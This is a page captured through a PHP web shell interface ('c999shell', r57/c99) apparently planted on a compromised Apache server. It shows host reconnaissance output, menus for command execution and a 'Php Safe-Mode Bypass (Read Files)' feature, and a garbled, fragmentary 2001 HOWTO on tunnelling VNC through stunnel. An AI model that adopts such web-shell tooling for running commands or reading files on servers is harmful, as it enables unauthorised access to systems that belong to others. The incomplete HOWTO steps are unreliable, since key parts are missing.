Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/doc/stunnel-4.15/ drwxr-xr-x |
Viewing file: VNC_StunnelHOWTO.html (8.22 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | VNC over STUNNEL with a Linux server and Windows 2000 client HOWTO
19 February 2001 ver 1.0 by Craig Furter and Arno van der Walt contact us at cfurter@vexen.co.za and arnovdw@mycomax.com
We assume that you have already downloaded VNCServer and VNCViewer.
First of all there is a step by step HOWTO and then we'll look at the theory behind all this.
a) [root@anthrax$]gunzip openssl-x.xx.tar.gz (repeat for all 3 the modules) b) [root@anthrax$]tar xvf openssl-x.xx.tar (repeat for all 3 the modules)
--cut here and copy
to VNCRegEdit.REG the double click file to
import--
a)libeay32.dll b)libssl.dll c)stunnel.pem
./stunnel -d 5900 -r 5901
stunnel -d 5900 -r unix.ip.adress:5900 -c .
ie. 10.10.1.53 in the window
./stunnel -d 5902 -r 5903 and the Windows 2000 command as follows: stunnel -d 5902 -r unix.ip.adress:5902 and remember to start another vncserver on the Linux box for each VNC display
10.10.1.53:2 etc.
The THEORY
Tunneling:
What this means is that software
(daemon) runs on the client and server machine. In this case, the
Windows 2000 machine is the client and the server is the *NIX
machine. Stunnel will then run as client on Windows 2000 and server
mode on the UNIX box.
A bit about VNC and displays
The -d is the listening IPaddress:port
and the -r is the remote IPaddress:port. VNC uses port 5900 for
display 0. That means that display 1 will be 5901. If you want VNC
server to listen for a connection on port 80 then the display number
will be 80 - 5900 = -5820. If you want VNC server to
VNC on the Windows 2000 machine
To connect from the client machine you
need to enter the client machines IP address and the "display"
(from the port conversion). But VNC will think that you are trying to
connect to the local machine and does not allow this. To override
this add the following to you registry.
VNC's Java client
Unfortunately this will not work well
with the build in web version. If you did not known about it, try
http'ing into a machine running VNC server on it, to port 58XX (where
XX is the display number), and the Java client will be loaded. |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0114 ]-- |